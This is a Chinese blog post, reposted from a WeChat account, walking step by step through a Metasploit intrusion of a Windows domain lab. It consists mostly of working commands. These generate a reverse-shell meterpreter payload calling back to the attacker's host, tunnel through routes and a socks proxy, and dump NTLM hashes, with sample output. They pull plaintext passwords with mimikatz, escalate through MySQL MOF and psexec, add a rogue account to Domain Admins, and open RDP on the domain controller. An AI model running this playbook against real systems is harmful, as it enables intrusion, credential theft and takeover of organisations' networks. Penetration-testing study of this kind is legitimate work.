记内网渗透的流程

  • A+
所属分类:安全文章

记内网渗透的流程

记内网渗透的流程

内网渗透有很多方法下面介绍的是使用kali的metasploit.


使用metasploit内网渗透的一般流程


metasploit生成攻击载荷(window/linux/php...)
msfVENOM  -p windows/meterpreter/reverse_tcp lhost=192.168.0.x  lport=xxx -f exe >/var/www/html/1.exe
本地监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.x
set lport xxx
exploit
增加路由
run autoroute  -s x.x.x.x/24
run autoroute –p
增加代理
use auxiliary/server/socks4a
打开/etc/prxoychains.conf文件修改
hash收集
run hashdump
提权
getuid 当前用户 
sysinfo 查看系统信息
getprivs 尽可能提升权限
getsystem 通过各种攻击向量来提升系统用户权限 等等。。。
查看ip地址详情
ipconfig /all
探测内网存活IP
run post/windows/gather/arp_scanner RHOSTS=192.168.x.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.x.0/24
保持会话,利用其它的攻击模块攻击内网其它主机
migrate 注入进程 
breakground

一次内网渗透实验


1.域的原理:



其实可以把域和[工作组]联系起来理解,在工作组上你一切的设置在本机上进行包括各种策略,用户登录也是登录在本机的,密码是放在本机的数据库来验证的。而如果你的计算机加入域的话,各种策略是[域控制器]统一设定,用户名和密码也是放到域控制器去验证,也就是说你的账号密码可以在同一域的任何一台计算机登录。

如果说工作组是“免费的旅店”那么域(Domain)就是“星级的宾馆”;工作组可以随便出出进进,而域则需要严格控制。“域”的真正含义指的是服务器控制网络上的计算机能否加入的计算机组合。一提到组合,势必需要严格的控制。所以实行严格的管理对网络安全是非常必要的。在对等网模式下,任何一台电脑只要接入网络,其他机器就都可以访问共享资源,如[共享上网]等。尽管[对等网络]上的共享文件可以加访问密码,但是非常容易被破解。在由Windows 9x构成的对等网中,数据的传输是非常不安全的 [1]

不过在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为“[域控制器]Domain Controller,简写为DC)”。

域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。

域控制器

Windows域中,该目录驻留在配置为“[域控制器]”的计算机上。域控制器是Windows[Samba]服务器,它管理用户和域交互之间的所有安全相关方面,集中安全性和管理。域控制器通常适用于具有10[台]以上PC的网络。域是计算机的逻辑分组。域中的计算机可以在小型[LAN]上共享物理接近度,或者它们可以位于世界的不同部分。只要他们能够沟通,他们的实际位置就无关紧要了 。

2.常用的域命令

1.查看当前网卡配置信息 包括所属域以及IP段
ipconfig /all
2.查看域
net view /domain

记内网渗透的流程


3.查看当前域中的计算机
net view

记内网渗透的流程


4.查看CORP域中的计算机
net view /domain:CORP

记内网渗透的流程


5.Ping计算机名可以得到IP
ping Wangsong-PC

记内网渗透的流程


net user /domain


记内网渗透的流程


7.获取域用户组信息(在域控查看)
net group /domain

记内网渗透的流程


8.获取当前域管理员信息(在域控查看)
net group "domain admins" /domain

记内网渗透的流程


9.查看域时间及域服务器的名字(在域控查看)
net time /domain

记内网渗透的流程


这个要域管理权限才可以的

10.添加普通域用户
net user hack hack /add /domain

记内网渗透的流程


11.将普通域用户提升为域管理员
net group "Domain Admins" hack /add /domain

记内网渗透的流程


3.利用metasploit生成后门


生成攻击载荷

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.220.135 lport=12345 -f exe >/var/www/html/s.exe
本地监听
use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.220.135(kali的IP地址)

set lport 12345(kali的端口)

exploit
成功运行木马meterpreter后:
getuid 当前用户

getprivs 尽可能提升权限

getsystem 通过各种攻击向量来提升系统用户权限

记内网渗透的流程


增加路由
route add 10.10.1.3 255.255.255.0 (内网路由)

记内网渗透的流程


(先扫描目标开放的端口在接下去看mysql)

use auxiliary/scanner/mysql/mysql_login(查看是否可弱口令登入)

记内网渗透的流程

记内网渗透的流程

记内网渗透的流程

use exploit/windows/smb/p**ec
use scanner/portscan/tcp

记内网渗透的流程


记内网渗透的流程


use exploit/windows/mysql/mysql_mof mysql之mof提权


记内网渗透的流程


记内网渗透的流程


Set payload windows/meterpreter/bind_tcp
(反弹内网的机子到外网的kali:内网的无法直接和外网通信)
通过mysql mof提权 得到 域客户机2003的 sessions

记内网渗透的流程


Shell:


记内网渗透的流程


通过ping内网的主机名 得到其IP地址


记内网渗透的流程


记内网渗透的流程

记内网渗透的流程


查看域的时间来确定域控制器是win_723。。。


记内网渗透的流程

获取 hashdump

获取明文


记内网渗透的流程


load mimikatzmsv  kerberos  

记内网渗透的流程


通过扫描得扫  10.10.1.3 3306端口  存在mysql服务


记内网渗透的流程


因为普通域用户 需要更改系统信息 都需要通过域管理员的操作 要输入帐号和密码

use exploit/windows/smb/p**ec

记内网渗透的流程


进入域控


记内网渗透的流程


注入进程


记内网渗透的流程


run post/windows/gather/hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f8db9dd8aa13fa4e008f693fb7c56935:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

在百度查找在线hash解密
开启域控3389
run  getgui  -e

得到域控的权限。


开启代理socks4需要修改kali的/etc/proxychains.conf   


记内网渗透的流程


最终实现在kal上远程操作内网域控


记内网渗透的流程

记内网渗透的流程

本文始发于微信公众号(疯猫网络):记内网渗透的流程

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: